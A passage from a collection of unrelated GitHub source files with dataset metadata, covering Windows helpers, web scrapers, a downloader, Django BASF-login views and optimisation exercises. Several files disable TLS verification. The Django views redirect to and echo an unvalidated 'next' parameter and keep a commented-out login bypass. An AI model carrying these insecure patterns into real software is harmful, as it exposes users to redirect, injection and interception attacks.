https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetenumresourcea\n RESOURCE_SCOPE_REMEMBERED = 3\n RESOURCE_TYPE_DISK = 1\n RESOURCE_USAGE_IGNORED = 0\n lpNetResource = None\n ptrHandle = ctypes.wintypes.HANDLE()\n\n class NETRESOURCEA(ctypes.Structure):\n #https://docs.microsoft.com/en-us/windows/win32/api/winnetwk/ns-winnetwk-netresourcea\n _fields_ = [\n (\"dwScope\", ctypes.wintypes.DWORD),\n (\"dwType\", ctypes.wintypes.DWORD),\n (\"dwDisplayType\", ctypes.wintypes.DWORD),\n (\"dwUsage\", ctypes.wintypes.DWORD),\n (\"lpLocalName\", ctypes.wintypes.LPSTR),\n (\"lpRemoteName\", ctypes.wintypes.LPSTR),\n (\"lpComment\", ctypes.wintypes.LPSTR),\n (\"lpProvider\", ctypes.wintypes.LPSTR)\n ]\n\n remembered_net_drives = []\n iRet = WNetOpenEnum(RESOURCE_SCOPE_REMEMBERED, RESOURCE_TYPE_DISK, RESOURCE_USAGE_IGNORED, lpNetResource, ctypes.byref(ptrHandle))\n # iRet (all Methods): https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes\n if (iRet == 0):\n entries = ctypes.c_int(-1)\n buffer = ctypes.c_int(16384) # 2048\n ptrBuffer = ctypes.create_string_buffer(buffer.value)\n\n iRet = WNetEnumResource(ptrHandle, ctypes.byref(entries), ptrBuffer, ctypes.byref(buffer))\n while ((iRet == 0) or (entries.value > 0)):\n ptr = ctypes.addressof(ptrBuffer)\n for i in range(entries.value):\n x = NETRESOURCEA.from_address(ptr)\n remembered_net_drives += x.lpLocalName.decode(\"ascii\")\n ptr += ctypes.sizeof(x)\n\n entries.value = -1\n buffer.value = 16384\n iRet = WNetEnumResource(ptrHandle, ctypes.byref(entries), ptrBuffer, ctypes.byref(buffer))\n\n iRet = WNetCloseEnum(ptrHandle)\n if (iRet != 0):\n pass\n return [x.upper() for x in remembered_net_drives[::2]]\n\n @classmethod\n def test_port(cls, host: str, port: str, timeout: int = 2):\n \"\"\"\n Test if network port is reachable\n\n :param host: hostname or ip\n :param port: port number\n :param timeout: connection timeout\n :return: True or error\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(timeout)\n sock.connect((host, int(port)))\n sock.shutdown(socket.SHUT_RDWR)\n except OSError as e:\n return e\n else:\n sock.close()\n return True\n\n @classmethod\n def strip_ansi_codes(cls, s: str) -> str:\n \"\"\"\n Remove as many ANSI color and control codes from ``s`` as possible\n\n :param s: raw input string\n :return: cleaned string\n \"\"\"\n\n def removebackspaces(text):\n \"\"\"\n Removes backspaces from ``text``\n\n :param text:\n :return: cleaned string\n \"\"\"\n\n backspace_or_eol = r'(.\\010)|(\\033\\[K)'\n n = 1\n while n > 0:\n text, n = re.subn(backspace_or_eol, '', text, 1)\n return text\n\n s = s.replace(r'\\x1b', '\\n' + r'\\x1b')\n s = re.sub(r'\\x1b\\[\\d*;\\d*;\\d*m', '', s)\n s = re.sub(r'\\x1b\\[\\d*;\\d*[fmHr]', '', s)\n s = re.sub(r'\\x1b\\[\\d*[tGEFDBCAPMnXJKjam@Ldkel]', '', s)\n s = re.sub(r'\\x1b\\[\\?\\d*[hl]', '', s)\n s = re.sub(r'\\x1b\\[\\?\\w*', '', s)\n s = re.sub(r'\\x1b\\[>\\d*[hl]', '', s)\n s = re.sub(r'\\x1b\\[[Hsu]', '', s)\n s = re.sub(r'\\x1b\\(\\w*', '', s)\n s = re.sub(r'\\x1b\\]0;[\\w*]', '', s)\n s = re.sub(r'\\x1b[=>]', '', s)\n s = re.sub('(\\n)+', '\\n', s)\n s = re.sub('\\A\\n|\\n\\Z', '', s)\n s = re.sub(r'\\A\\v|\\v\\Z', '', re.sub(r'(\\v)+', '\\n', s))\n s = s.replace('\\07', '')\n # if I missed something, then get rid of it hopefully now\n ansi_escape1 = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ -\\/]*[@-~]')\n s = ansi_escape1.sub('', s)\n ansi_escape2 = re.compile(r'\\x1b(\\[.*?[@-~]|\\].*?(\\x07|\\x1b\\\\))')\n s = ansi_escape2.sub('', s)\n s = removebackspaces(s)\n\n return s\n #s = re.sub(r'\\x1b\\[([0-9,A-Z]{1,2})?(;[0-9]{1,2})?(;[0-9]{1,3})?[m|l|H|K]?', '', s)\n #s = re.sub(r'\\x1b\\[(>\\?)([0-9,A-Z]{1,2})?(;[0-9]{1,2})?(;[0-9]{1,3})?[m|l|H|K|S|u]?', '', s)\n #return s\n\n #subdirs = get_subdirlist(r'\\\\file01.acme.local\\home$')\n @classmethod\n def get_subdirlist(cls, path: str):\n \"\"\"\n Return list of subdirectories\n\n :param path: base pathname as r'string'\n :return: list of subdirectories\n \"\"\"\n wpath = WindowsPath(path)\n return [f.name for f in wpath.iterdir() if f.is_dir()]\n\n # WINDOWS ONLY\n if sys.platform.lower().startswith('win'):\n @classmethod\n def regkey_value(cls, path, name=\"\", start_key = None):\n \"\"\"\n Query windows registry value\n\n .. see: http://code.activestate.com/recipes/578689-get-a-value-un-windows-registry/\n\n :Example:\n\n bios_vendor = regkey_value(r\"HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\", \"BIOSVendor\")\n\n :param path: registry path\n :param name: value name (\"\" for default)\n :param start_key: start key\n :return: key value\n \"\"\"\n\n if isinstance(path, str):\n path = path.split(\"\\\\\")\n if start_key is None:\n start_key = getattr(winreg, path[0])\n return Helper.regkey_value(path[1:], name, start_key)\n else:\n subkey = path.pop(0)\n with winreg.OpenKey(start_key, subkey) as handle:\n assert handle\n if path:\n return Helper.regkey_value(path, name, handle)\n else:\n desc, i = None, 0\n while not desc or desc[0] != name:\n desc = winreg.EnumValue(handle, i)\n i += 1\n return desc[1]\n\n @classmethod\n def get_msi_property(cls, path: str, property=\"ProductCode\"):\n \"\"\"\n Return the MSI property for a given MSI package file\n Standard: return ProductCode\n\n :param path: full path of MSI file\n :return: MSI ProductCode String\n \"\"\"\n\n db = OpenDatabase(path, MSIDBOPEN_READONLY)\n view = db.OpenView (\"SELECT Value FROM Property WHERE Property='\" + property + \"'\")\n view.Execute(None)\n result = view.Fetch()\n\n return result.GetString(1)\n\n\n","repo_name":"pandel/opsiPackageBuilder","sub_path":"oPB/core/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":17089,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"70747405992","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\n\r\n\r\nclass Articolo:\r\n \"\"\"Articolo con titolo, data, descrizione, immagine e link.\"\"\"\r\n\r\n def __init__(\r\n self, titolo: str, data: str, descrizione: str, immagine: str, link: str\r\n ) -> None:\r\n self.titolo = titolo\r\n self.data = datetime.datetime.fromisoformat(data)\r\n self.descrizione = descrizione\r\n self.immagine = immagine\r\n self.link = link\r\n\r\n def __str__(self) -> str:\r\n return f'''Titolo: {self.titolo}\r\n Descrizione: {self.descrizione}\r\n Data: {self.data.date()}\r\n Immagine: {self.immagine}\r\n Link: {self.link}'''\r\n\r\n\r\ndef get_articoli() -> list[Articolo]:\r\n \"\"\"Restituisce la lista degli articoli presenti sul sito di RomaTre, dal più recente al più vecchio.\"\"\"\r\n\r\n # Scarica il sito\r\n result = requests.get(\r\n \"https://ingegneria.uniroma3.it/it/archivi/channel/in-evidenza-14/\",\r\n verify=False,\r\n )\r\n\r\n # Beautifulsuppa il sito\r\n soup = BeautifulSoup(result.content, features=\"html.parser\")\r\n\r\n # Inizializza lista di articoli\r\n articoli = []\r\n\r\n # Aggiunge articoli alla lista\r\n for articolo in soup.find_all(\"article\"):\r\n link = articolo.header.h2.a.attrs[\"href\"]\r\n titolo = articolo.header.h2.a.text\r\n immagine = articolo.div.figure.a.img.attrs[\"src\"]\r\n descrizione = articolo.find_all(\"div\")[1].find_all(\"div\")[1].text\r\n data = articolo.footer.span.time.attrs[\"datetime\"]\r\n\r\n articoli.append(Articolo(titolo, data, descrizione, immagine, link))\r\n\r\n return articoli\r\n","repo_name":"BuonHobo/sitarello","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358883432","text":"\nuser_songs_1 = {\n \"David\": [\"song1\", \"song2\", \"song3\", \"song4\", \"song8\"],\n \"Emma\": [\"song5\", \"song6\", \"song7\"]\n}\n\nsong_genres_1 = {\n \"Rock\": [\"song1\", \"song3\"],\n \"Dubstep\": [\"song7\"],\n \"Techno\": [\"song2\", \"song4\"],\n \"Pop\": [\"song5\", \"song6\"],\n \"Jazz\": [\"song8\", \"song9\"]\n}\noutput_1 = {\n \"David\": [\"Rock\", \"Techno\"],\n \"Emma\": [\"Pop\"]\n}\ndef favogenere(user_songs_1,song_genres_1):\n res = {}\n for key in user_songs_1:\n res[key] = []\n\n for key, value in user_songs_1.items():\n #print('1------', key, value)\n d = {}\n for each in value:\n k = findKey(each)\n if k not in d:\n d[k] = 1\n else:\n d[k] += 1\n #print('d ---', d)\n max1 = max(d.values())\n #print('max: ',max1)\n for q,w in d.items():\n if w == max1:\n res[key].append(q)\n # print('d:---', d)\n # print('max---',max(d, key = d.get))\n return res\n\ndef findKey(string):\n for key in song_genres_1:\n for each in song_genres_1[key]:\n if each == string:\n return key\n\nprint(favogenere(user_songs_1,song_genres_1))\n\n\n\n# def favGenere(user_songs, song_genere):\n# d = {}\n# for key, value in user_songs.items():\n# for each in value:\n# for gen in song_genere:\n# if each in song_genere[gen]:\n# del user_songs[key][user_songs[key].index(each)]\n# user_songs[key].append(gen)\n \n# return user_songs\n\n#print(favGenere(user_songs_1, song_genres_1))\n\n\n","repo_name":"Ashi-s/coding_problems","sub_path":"DevPost/DevPost_favouriateGenere.py","file_name":"DevPost_favouriateGenere.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1823004153","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import StandardScaler\n\n\nclass ThresholdStandardScaler(BaseEstimator, TransformerMixin):\n\n \"\"\"\n like sklearn.preprocssing.StandardScaler, but thresholds the possible\n values to within a provided range, in order to be less sensitive to\n outliers\n \"\"\"\n\n def __init__(self,\n lower_threshold=-3,\n upper_threshold=3,\n *args,\n **kwargs):\n self.lower_threshold = lower_threshold\n self.upper_threshold = upper_threshold\n assert self.upper_threshold > self.lower_threshold\n self.trn = StandardScaler(*args, **kwargs)\n\n def fit(self, X, y=None):\n self.trn.fit(X)\n return self\n\n def transform(self, X):\n res = self.trn.transform(X)\n return np.clip(res, self.lower_threshold, self.upper_threshold)\n","repo_name":"diogo149/du","sub_path":"du/preprocessing/threshold_standard_scaler.py","file_name":"threshold_standard_scaler.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73116525992","text":"#-*- coding: utf-8 -*-\n'''\nCreated on 3 сент. 2010\n\n@author: ivan\n'''\nfrom foobnix.preferences.config_plugin import ConfigPlugin\nfrom gi.repository import Gtk\nfrom foobnix.fc.fc import FC\nfrom foobnix.helpers.dialog_entry import info_dialog_with_link_and_donate\nclass NotificationConfig(ConfigPlugin):\n\n name = _(\"Notifications\")\n\n def __init__(self, controls):\n box = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n box.hide()\n\n self.check_new_version = Gtk.CheckButton.new_with_label(_(\"Check for new foobnix release on start\"))\n self.check_new_version.show()\n\n demo = Gtk.Button.new_with_label(_(\"Show new foobnix release avaliable demo dialog\"))\n demo.connect(\"clicked\", lambda * a:info_dialog_with_link_and_donate(\"foobnix [version]\"))\n demo.show()\n\n\n box.pack_start(self.check_new_version, False, True, 0)\n box.pack_start(demo, False, False, 0)\n\n self.widget = box\n\n def on_load(self):\n self.check_new_version.set_active(FC().check_new_version)\n\n def on_save(self):\n FC().check_new_version = self.check_new_version.get_active()\n\n\n\n\n","repo_name":"foobnix/foobnix","sub_path":"foobnix/preferences/configs/notification_conf.py","file_name":"notification_conf.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"34053798756","text":"# -*- coding: utf-8 -*-\n\nimport functools\nimport asyncio\n\nfrom .request import get_content_length, request_range\nfrom .models import File, Shower\nfrom .utils import make_headers\nfrom .color import color_str\n\n\nasync def download(args):\n file_obj = File(args.out)\n\n method = args.method\n url = args.url\n headers = make_headers(args)\n data = args.data\n timeout = args.timeout\n chuck_size = args.chuck_size\n concurrency = args.concurrency\n\n content_length = await get_content_length(method, url, headers=headers, data=data, timeout=timeout)\n\n if file_obj.is_init():\n file_obj.record_data(content_length)\n else:\n if file_obj.info.content_length != content_length:\n print(color_str(\"Conflict content length:\", codes=(1, 91)), file_obj.info.content_length, content_length)\n return None\n\n file_obj.info.content_length = content_length\n file_obj.create_file()\n\n shower = Shower(args.out, content_length, file_obj.info.completed_size, concurrency, chuck_size)\n\n show_task = asyncio.ensure_future(shower.show())\n\n ctrl_queue = asyncio.queues.Queue(maxsize=concurrency)\n\n part = 1\n for begin_point, end_point in file_obj.undownload_chucks:\n # chunk point\n # point is the begin of the chunk\n # point_t is the end of the chunk\n point = begin_point\n point_t = 0\n while point <= end_point:\n await ctrl_queue.put(None)\n point_t = min(point + chuck_size, end_point)\n\n task = asyncio.ensure_future(\n request_range(method, url, point, point_t, ctrl_queue, headers=headers, data=data, timeout=timeout)\n )\n\n task.add_done_callback(functools.partial(save_data, file_obj, point, point_t, shower, part))\n\n if point == point_t:\n break\n\n point = min(point_t + 1, end_point)\n part += 1\n\n while ctrl_queue.qsize():\n await asyncio.sleep(1)\n\n await asyncio.sleep(1)\n file_obj.close()\n file_obj.info.remove_aget()\n shower.over()\n show_task.cancel()\n\n\ndef save_data(file_obj, begin_point, end_point, shower, part, fut):\n data = fut.result()\n\n file_obj.write(data, begin_point)\n file_obj.record_data(begin_point, end_point)\n\n shower.append_info(part, begin_point, end_point)\n","repo_name":"PeterDing/aget","sub_path":"aget/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"72"} +{"seq_id":"8222457663","text":"from django.shortcuts import render\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as django_login\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom users.models import Person\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth import logout as django_logout\nfrom urllib.parse import quote, unquote\nimport os\nimport requests\n\n\ndef landing_page(request):\n \"\"\" View for the landing page.\n Args:\n request: Request object.\n Returns:\n HttpResponse: Rendered landing page.\n \"\"\"\n return render(request, 'landing_page/landing.html', {})\n\ntoken_to_info_url = 'https://app.roqs.basf.net/auth/token2info'\nbasf_login = \"https://app.roqs.basf.net/auth/login.html\"\nredirect_uri = \"https%3A%2F%2Fapp-dev.roqs.basf.net%2Fprai_information_desk%2Fafter_login\"\n\ndef login_view(request):\n \"\"\" Method to redirect user to the BASF federation login.\n The redirect_uri is passed as get_request parameter and refers to the route that corresponds to after_login.\n Args:\n request: Request object.\n Returns:\n HttpResponse: Redirect to BASF login or Bad Request message.\n \"\"\"\n try:\n #user = Person.objects.filter(username__iexact=\"gerstem5\")#Bypass basf auth\n #django_login(request, user[0])\n #return HttpResponseRedirect(request.GET[\"next\"])\n\n next = request.GET[\"next\"]\n url = basf_login + \"?redirect_uri=\" + redirect_uri\n url += \"?next=\"\n url += quote(next, safe=\"\")\n return HttpResponseRedirect(url)\n except:\n return HttpResponse(\"Bad Request\",status=400)\n\ndef after_login(request):\n \"\"\" Authentification callback. This method is triggered after the authentification cookies were set by the federation login.\n Makes a request to token_to_info_url and checks whether the access token retrieved from cookies is a valid one.\n Args:\n request: Request object\n Returns:\n HttpResponseRedirect: Redirect to the redirect url (get request parameter)\n \"\"\"\n try:\n redirect_url = request.GET[\"next\"]\n auth_header = request.META\n cookie_federation_access_token = request.COOKIES.get('basf_federation_access_token')\n cookie_federation_cn = request.COOKIES.get('basf_federation_cn')\n r = requests.post(token_to_info_url, data={'token': cookie_federation_access_token}, verify=False, timeout=30)\n assert r.status_code == 200\n session_federation = r.json()\n\n if not 'error' in session_federation and session_federation['user_id'] == cookie_federation_cn:\n #User is authenticated\n user = Person.objects.filter(username__iexact=cookie_federation_cn)\n if user.exists():\n #User is member of production ai\n django_login(request, user[0])\n return HttpResponseRedirect(redirect_url)\n #User not authentificated or not member of production AI\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n except Exception as e:\n #Something went wrong during authentification\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n\n\ndef logout(request):\n \"\"\" Logs the user out\n Args:\n request: Request object\n Returns:\n HttpResponseRedirect: Redirect to landing page\n \"\"\"\n django_logout(request)#TODO log out from BASF too (!?)\n return HttpResponseRedirect(reverse_lazy(\"landing_page\"))\n\ndef login_required(request):\n \"\"\" View method that renders login required message.\n Args:\n request: Request object\n Returns:\n HttpResponse with rendered login required template or bad request message.\n \"\"\"\n try:\n return render(request, 'landing_page/login_required.html', {\"next\":request.GET[\"next\"]})\n except:\n return HttpResponse(\"Bad Request at login required: Next is \" + request.GET[\"next\"],status=400)\n","repo_name":"elerator/PRAI","sub_path":"app/landing_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29934133517","text":"import os,requests,time,pyautogui\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\n\n# Initialize Chrome driver using the Service object\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n\n# Set the URL of the web page containing the images\nurl = \"Enter your URL here\"\n\ndriver.implicitly_wait(30)\n\n# Load the web page\n# driver.maximize_window()\ndriver.get(url)\ntime.sleep(20)\n\ndef download_imgs(i):\n print(f\"Landed on page: {i}=============================\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n # Find all image elements using the specified XPath\n image_elements = driver.find_elements(\"xpath\", \"//*[@class='thumb-img']\")\n \n # Iterate over the image elements and extract the image URLs\n for index, image_element in enumerate(image_elements):\n # Get the source URL of the image\n image_url = image_element.get_attribute(\"src\")\n\n # Download the image\n response = requests.get(image_url)\n image_data = response.content\n\n # Extract the image file name\n image_name = f\"{i}_{index}.jpg\"\n\n # Create a folder to store the images\n folder_path = f\"D:/Projects/Face Detection/Images/{i}/\"\n os.makedirs(folder_path, exist_ok=True)\n\n # Save the image to the specified folder\n image_path = os.path.join(folder_path, image_name)\n with open(image_path, \"wb\") as f:\n f.write(image_data)\n print(f\"Image saved: {image_path}\")\n\ndef click_next():\n # Locate the button on the screen\n button_location = pyautogui.locateOnScreen('D:/Projects/Web Scraping/button.png',confidence=0.95)\n if button_location is not None:\n # Get the center coordinates of the button\n button_center = pyautogui.center(button_location)\n # Move the mouse to the button and click\n pyautogui.moveTo(button_center.x, button_center.y, duration=1)\n pyautogui.click()\n pyautogui.moveRel(100, 0, duration=0.5)\n # Optional: Add a delay before clicking\n time.sleep(1) # Add a delay of 1 second (or any desired duration) before clicking\n else:\n print(\"Button not found on the screen---------------------------------------------------------------------------------------------------------------\")\n\nfor i in range(67, 76):\n download_imgs(i)\n click_next()\n print(\"******************************Page: \"+str(i)+\" images downloaded\")","repo_name":"SuhailArfaath/Data-Mining-from-Dynamic-Loading-Pages","sub_path":"Web Scrapping.py","file_name":"Web Scrapping.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24639449739","text":"from django.shortcuts import render, redirect\nfrom .models import Post \nfrom datetime import datetime\n# Create your views here.\n\n\ndef home(request):\n posts = Post.objects.order_by('date')\n post_ddays = [calculate_dday(post.date) for post in posts]\n\n context = {\n 'posts': zip(posts, post_ddays)\n # post 객체와 D-day 값을 튜플 형태로 묶어서 전달\n }\n\n return render(request, 'home.html', context)\n\n# def home(request):\n #posts = Post.objects.order_by('date')\n\n # return render(request, 'home.html', {'posts': posts})\n\ndef homedday(request):\n posts = posts = Post.objects.all\n ddays = calculate_dday(posts.date)\n return render(request, 'detail.html', {'post': post, 'dday': dday})\n\ndef new(request):\n if request.method == 'POST':\n post = Post.objects.create(\n title = request.POST['title'],\n date = request.POST['date'],\n content = request.POST['content'] \n )\n return redirect('detail', post.pk)\n\n return render(request, 'new.html')\n\ndef calculate_dday(post_date):\n today = datetime.today().date()\n dday = (post_date - today).days\n\n return dday\n\ndef detail(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n dday = calculate_dday(post.date)\n return render(request, 'detail.html', {'post': post, 'dday': dday})\n\ndef update(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n\n if request.method == 'POST':\n Post.objects.filter(pk=post_pk).update(\n title = request.POST['title'],\n date = request.POST['date'],\n content = request.POST['content'] \n )\n\n return redirect('detail', post_pk)\n\n return render(request, 'update.html', {'post': post})\n\ndef delete(request, post_pk):\n post = Post.objects.get(pk=post_pk)\n post.delete()\n\n return redirect('home')\n\n","repo_name":"haward0519/NEXT_HW","sub_path":"Todolist/project/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1450716305","text":"#!/usr/bin/env python\n\nfrom pyswip import Prolog\nfrom helper import py2pl\n\nprolog = Prolog()\n\n# Fakty + Reguły\nprolog.consult(\"ex2.pl\")\n\n# Zapytania\nlist1 = [1,2,3,4]\nlist2 = [5,5,6,6]\n\nqueries = [\n f'not_in_list(5, {py2pl(list1)})',\n f'not_in_list(5, {py2pl(list2)})',\n f'all_different({py2pl(list1)})',\n f'all_different({py2pl(list2)})',\n f'domain({py2pl(list1)}, 1, 4)',\n f'domain({py2pl(list2)}, 1, 4)',\n]\n\nfor query in queries:\n print(query, bool(list(prolog.query(query))))\n","repo_name":"solewniczak/Laboratorium_SI_Przyklady","sub_path":"Lab 1 - Logika pierwszego rzędu/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118722153","text":"from collections import Counter\nfrom itertools import chain, product\nfrom typing import List\n\n\n# https://leetcode.com/problems/number-of-valid-move-combinations-on-chessboard/discuss/1549108/Python-short-solution-explained\nclass Solution:\n\n def __init__(self):\n self.res = set()\n\n def countCombinations(self, pieces: List[str], positions: List[List[int]]) -> int:\n positions = [tuple(x) for x in positions]\n poss = {\n 'rook': ((1, 0), (-1, 0), (0, 1), (0, -1)),\n 'bishop': ((1, 1), (1, -1), (-1, 1), (-1, -1)),\n 'queen': ((1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (1, -1), (-1, 1), (-1, -1)),\n }\n\n for dirs in product(*(poss[i] for i in pieces)):\n self.dfs(positions, dirs, (1 << len(pieces)) - 1)\n\n return len(self.res)\n\n def dfs(self, pos, dirs, stopped_mask):\n if stopped_mask == 0:\n return\n\n self.res.add(tuple(pos))\n\n for active in range(1 << len(dirs)):\n if (stopped_mask & active) != active:\n continue\n\n new_pos = list(pos)\n new_mask = stopped_mask ^ active\n\n for i in range(len(new_pos)):\n new_pos[i] = (\n new_pos[i][0] + dirs[i][0] * ((new_mask >> i) & 1),\n new_pos[i][1] + dirs[i][1] * ((new_mask >> i) & 1)\n )\n\n if len(Counter(new_pos)) < len(dirs):\n continue\n\n all_c = list(chain(*new_pos))\n\n if min(all_c) <= 0 or max(all_c) > 8:\n continue\n\n self.dfs(new_pos, dirs, new_mask)\n","repo_name":"cabulous/leetcode","sub_path":"python/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4933774035","text":"import itertools\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import distance_matrix\nimport matplotlib\nimport matplotlib.pylab as plt\nimport seaborn as sns\nimport pulp\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nn_customer=7\nn_point=n_customer+1\nvehicle_capacity=4\ndf=pd.DataFrame({\n 'x':[20,16,31,37,11,32,4,23,20],\n 'y':[0,29,27,30,29,19,9,22,0],\n})\ndf.iloc[0]['x']=20\ndf.iloc[0]['y']=0\n\n# get distance matrix\n\ndistances = pd.DataFrame(distance_matrix(df[['x', 'y']].values, df[['x', 'y']].values), index=df.index, columns=df.index).values\n\nfig, ax = plt.subplots(figsize=(4,3))\nsns.heatmap(distances, ax=ax, cmap='Blues', annot=True, fmt='.0f', cbar=True, cbar_kws={\"shrink\": .3}, linewidths=.1)\nplt.title('distance matrix')\nplt.show()\n# check TSP state\n\nplt.figure(figsize=(5, 5))\n\n# draw problem state\nfor i, row in df.iterrows():\n if i == 0:\n plt.scatter(row['x'], row['y'], c='r')\n plt.text(row['x'] + 1, row['y'] + 1, 'depot')\n else:\n plt.scatter(row['x'], row['y'], c='black')\n plt.text(row['x'] + 1, row['y'] + 1, f'{i}')\n \nplt.xlim([-10, 50])\nplt.ylim([-10, 50])\nplt.title('points: id')\nplt.show()\n\n\n#定数の定義\nM=10000\ne=1\nm=1\na=50\nproblem = pulp.LpProblem('KUPC2018_C', pulp.LpMinimize)\n\n# 変数とその定義域の定義\nx=pulp.LpVariable.dicts('x',((i,j) for i in range(n_point) for j in range(n_point)),lowBound=0,upBound=1,cat='Binary')\ny=pulp.LpVariable.dicts('y',((i,j) for i in range(n_point) for j in range(n_point)),lowBound=0,upBound=1,cat='Binary')\n# we need to keep track of the order in the tour to eliminate the possibility of subtours\nu = pulp.LpVariable.dicts('u', (i for i in range(n_point)), lowBound=1, upBound=n_point, cat='Integer')\n\n# set objective function\nproblem += pulp.lpSum((distances[i][j])*(x[i,j])for i in range(n_point)for j in range(n_point))/40\n\n\nproblem += (pulp.lpSum(x[0,j]for j in range(1,n_point)))== 1\n\n\nproblem += (pulp.lpSum(x[j,0]for j in range(1,n_point))) == 1\n\n\n#全ての頂点を回る\n\n\"\"\"\nfor j in range(n_point):\n problem += (y[j,i] for i in range(n_point)if i != j)<= pulp.lpSum(x[h,j]for h in range(n_point)if h != j)\n\"\"\"\n\nfor j in range(1,n_point):\n problem += pulp.lpSum(x[i,j]for i in range(n_point) if i !=j) + pulp.lpSum(y[j,0])==1\n#全ての頂点を回る\n\nfor j in range(n_point):\n problem +=pulp.lpSum(x[i,j]for i in range(n_point) if i != j)==pulp.lpSum(x[j,k]for k in range(n_point)if j != k)\n#iから出発して、jに到着するなら、jから出発してに到着\n\n#ドローンの配達先は全てドローンで行う\n\"\"\"\nfor i in range(1,n_point):\n problem += pulp.lpSum(y[i,j] for j in range(1,n_point) if i != j) <=2\n\"\"\"\n\"\"\"\nproblem+= pulp.lpSum(y[i,j] for j in range(1,n_point)for i in range(1,n_point) if i != j) ==2\n\"\"\"\n\"\"\"\nfor j in range(1,n_point):\n problem += pulp.lpSum(y[i,j]for i in range(n_point) if i !=j) + pulp.lpSum(y[j,k]for k in range(1,n_point)if i != j)<=1\n\"\"\"\nproblem += pulp.lpSum(y[j,0]for j in range(1,n_point)) ==m\n\nfor j in range(1,n_point):\n problem +=y[0,j]==y[j,0]\n\nfor i in range(n_point):\n for j in range(n_point):\n if i !=j:\n problem += e >= (distances[i][j]/a+distances[j][0]/a)*y[i,j] \n#最大飛行時間\n\n\"\"\"\nfor i in range(n_point):\n for j in range(n_point): \n if i != j and (i != 0 and j != 0):\n problem += u[i] - u[j] >= 1 - (n_point+1) * (1 - y[i, j])\n\"\"\"\n# eliminate subtour\nfor i in range(n_point):\n for j in range(n_point): \n if i != j and (i != 0 and j != 0):\n problem += u[i] - u[j] <= (n_point+1) * (1 -x[i, j])- 1\n\n# solve problem\nstatus = problem.solve()\n\nprint(pulp.LpStatus[status])\n# output status, value of objective function\nstatus, pulp.LpStatus[status], pulp.value(problem.objective)\n\n\n# check TSP problem and optimized route\n\nplt.figure(figsize=(5, 5))\n\n# draw problem state\nfor i, row in df.iterrows():\n if i == 0:\n plt.scatter(row['x'], row['y'], c='r')\n plt.text(row['x'] + 1, row['y'] + 1, 'depot')\n \n else:\n plt.scatter(row['x'], row['y'], c='black')\n plt.text(row['x'] + 1, row['y'] + 1, f'{i}')\n \nplt.xlim([-10, 50])\nplt.ylim([-10, 50])\nplt.title('points: id')\n\n# draw optimal route\nroutes = [(i, j) for i in range(n_point) for j in range(n_point) if pulp.value(x[i, j]) == 1]\narrowprops = dict(arrowstyle='->', connectionstyle='arc3', edgecolor='blue')\nfor i, j in routes:\n plt.annotate('', xy=[df.iloc[j]['x'], df.iloc[j]['y']], xytext=[df.iloc[i]['x'], df.iloc[i]['y']], arrowprops=arrowprops)\nroutes1 = [(i, j) for i in range(n_point) for j in range(n_point) if pulp.value(y[i, j]) == 1]\n\narrowprops = dict(arrowstyle='->', connectionstyle='arc3', edgecolor='red')\nfor i, j in routes1:\n plt.annotate('', xy=[df.iloc[j]['x'], df.iloc[j]['y']], xytext=[df.iloc[i]['x'], df.iloc[i]['y']], arrowprops=arrowprops) 